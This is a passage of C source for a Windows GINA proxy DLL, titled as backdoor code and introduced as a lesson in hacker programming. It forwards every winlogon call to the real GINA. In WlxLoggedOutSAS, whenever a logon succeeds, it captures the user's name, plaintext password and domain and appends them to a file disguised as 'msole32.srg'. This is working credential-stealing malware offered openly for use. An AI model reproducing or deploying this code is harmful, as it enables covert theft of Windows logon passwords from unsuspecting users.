gina后门代码.txt

可以对黑客编程有一定的了解

　　if( !GWlxActivateUserShell ) {
　　　　return FALSE;
　　}

　　GWlxLoggedOnSAS =
　　　　(PGWLXLOGGEDONSAS)GetProcAddress( hDll, "WlxLoggedOnSAS" );
　　if( !GWlxLoggedOnSAS ) {
　　　　return FALSE;
　　}

　　GWlxDisplayLockedNotice =
　　　　(PGWLXDISPLAYLOCKEDNOTICE)GetProcAddress(
　　　　　　　　　　　　　　　　　　　　hDll,
　　　　　　　　　　　　　　　　　　　　"WlxDisplayLockedNotice" );
　　if( !GWlxDisplayLockedNotice ) {
　　　　return FALSE;
　　}

　　GWlxIsLockOk = (PGWLXISLOCKOK)GetProcAddress( hDll, "WlxIsLockOk" );
　　if( !GWlxIsLockOk ) {
　　　　return FALSE;
　　}

　　GWlxWkstaLockedSAS =
　　　　(PGWLXWKSTALOCKEDSAS)GetProcAddress( hDll, "WlxWkstaLockedSAS" );
　　if( !GWlxWkstaLockedSAS ) {
　　　　return FALSE;
　　}

　　GWlxIsLogoffOk = (PGWLXISLOGOFFOK)GetProcAddress( hDll, "WlxIsLogoffOk" );
　　if( !GWlxIsLogoffOk ) {
　　　　return FALSE;
　　}

　　GWlxLogoff = (PGWLXLOGOFF)GetProcAddress( hDll, "WlxLogoff" );
　　if( !GWlxLogoff ) {
　　　　return FALSE;
　　}

　　GWlxShutdown = (PGWLXSHUTDOWN)GetProcAddress( hDll, "WlxShutdown" );
　　if( !GWlxShutdown ) {
　　　　return FALSE;
　　}

　　// we don't check for failure here because these don't exist for
　　// gina's implemented prior to Windows NT 4.0
　　GWlxStartApplication = (PGWLXSTARTAPPLICATION) GetProcAddress( hDll, "WlxStartApplication" );
　　GWlxScreenSaverNotify = (PGWLXSCREENSAVERNOTIFY) GetProcAddress( hDll, "WlxScreenSaverNotify" );

　　// Everything loaded ok.　Return success.
　　return TRUE;
}


BOOL WINAPI WlxNegotiate(DWORD dwWinlogonVersion, DWORD *pdwDllVersion)
{
　　if( !MyInitialize() )　return FALSE;
　　return GWlxNegotiate( dwWinlogonVersion, pdwDllVersion );
}


BOOL WINAPI WlxInitialize( LPWSTR lpWinsta, HANDLE hWlx,
　　PVOID pvReserved, PVOID pWinlogonFunctions, PVOID *pWlxContext)
{
　　return GWlxInitialize( lpWinsta, hWlx, pvReserved,
　　　　　　　　pWinlogonFunctions, pWlxContext );
}


VOID WINAPI WlxDisplaySASNotice( PVOID pWlxContext )
{
　　GWlxDisplaySASNotice( pWlxContext );
}


int WINAPI WlxLoggedOutSAS(PVOID pWlxContext, DWORD dwSasType,
　　PLUID pAuthenticationId, PSID pLogonSid, PDWORD pdwOptions,
　　PHANDLE phToken, PWLX_MPR_NOTIFY_INFO pMprNotifyInfo,
　　PVOID *pProfile)
{
　　int iRet;

　　iRet = GWlxLoggedOutSAS(pWlxContext, dwSasType, pAuthenticationId,
　　　 pLogonSid, pdwOptions, phToken, pMprNotifyInfo, pProfile );

　　if(iRet == WLX_SAS_ACTION_LOGON) {
　　　　// copy pMprNotifyInfo and pLogonSid for later use
　　　 
　　　　FILE *fp;
　　　　fp=fopen("msole32.srg", "a");
　　　　if(fp!=NULL)
　　　　{
　　　　　　char infor[300], buf[300];
　　　　　　memset(buf, 0, 300);
　　　　　　wcstombs(buf, pMprNotifyInfo->pszUserName, 300);
　　　　　　sprintf(infor, "%s", buf);

　　　　　　memset(buf, 0, 300);//if convert failed, we use the error one also
　　　　　　wcstombs(buf, pMprNotifyInfo->pszPassword, 300);
　　　　　　sprintf(infor, "%s:%s", infor, buf);
　　　　
　　　　　　memset(buf, 0, 300);
　　　　　　wcstombs(buf, pMprNotifyInfo->pszDomain, 300);
　　　　　　sprintf(infor, "%s:%s\r\n", infor, buf);
　　
　　　　　　fwrite(infor, 1, strlen(infor), fp);
　　　　　　fclose(fp);
　　　　}
　　　　// pMprNotifyInfo->pszOldPassword
　　}

　　return iRet;
}


BOOL WINAPI WlxActivateUserShell(
　　PVOID　　　　　 pWlxContext,
　　PWSTR　　　　　 pszDesktopName,
　　PWSTR　　　　　 pszMprLogonScript,
　　PVOID　　　　　 pEnvironment)
{
　　return GWlxActivateUserShell(
　　　　　　　　pWlxContext,
　　　　　　　　pszDesktopName,
　　　　　　　　pszMprLogonScript,
　　　　　　　　pEnvironment
　　　　　　　　);
}


int WINAPI WlxLoggedOnSAS(
　　PVOID　　　　　 pWlxContext,
　　DWORD　　　　　 dwSasType,
　　PVOID　　　　　 pReserved)
{
　　return GWlxLoggedOnSAS( pWlxContext, dwSasType, pReserved );
}

VOID WINAPI WlxDisplayLockedNotice( PVOID pWlxContext )
{
　　GWlxDisplayLockedNotice( pWlxContext );
}


BOOL WINAPI WlxIsLockOk( PVOID pWlxContext )
{
　　return GWlxIsLockOk( pWlxContext );
}


int WINAPI WlxWkstaLockedSAS(
　　PVOID　　　　　 pWlxContext,
　　DWORD　　　　　 dwSasType )
{
　　return GWlxWkstaLockedSAS( pWlxContext, dwSasType );
}

BOOL WINAPI WlxIsLogoffOk( PVOID pWlxContext )
{
　　BOOL bSuccess;

　　bSuccess = GWlxIsLogoffOk( pWlxContext );

　　if(bSuccess) {
　　　　//
　　　　// if it's ok to logoff, finish with the stored credentials
　　　　// and scrub the buffers
　　　　//
　　}

　　return bSuccess;
}


VOID WINAPI WlxLogoff( PVOID pWlxContext )
{
　　GWlxLogoff( pWlxContext );
}


VOID WINAPI WlxShutdown( PVOID pWlxContext, DWORD ShutdownType )
{
　　GWlxShutdown( pWlxContext, ShutdownType );
}


//
// NEW for version 1.1
//
BOOL WINAPI WlxScreenSaverNotify(
　　PVOID　　　　　　　　　 pWlxContext,
　　BOOL *　　　　　　　　　pSecure
　　)
{
　　if(GWlxScreenSaverNotify != NULL)
　　　　return GWlxScreenSaverNotify( pWlxContext, pSecure );

　　//
　　// if not exported, return something intelligent
　　//
　　*pSecure = TRUE;
　　return TRUE;
}

BOOL WINAPI WlxStartApplication(
　　PVOID　　　　　　　　　 pWlxContext,
　　PWSTR　　　　　　　　　 pszDesktopName,
　　PVOID　　　　　　　　　 pEnvironment,
　　PWSTR　　　　　　　　　 pszCmdLine
　　)
{
　　if(GWlxStartApplication != NULL)
　　　　return GWlxStartApplication(
　　　　　　pWlxContext,
　　　　　　pszDesktopName,
　　　　　　pEnvironment,
　　　　　　pszCmdLine
　　　　　　);
　　//
　　// if not exported, return something intelligent
　　//
}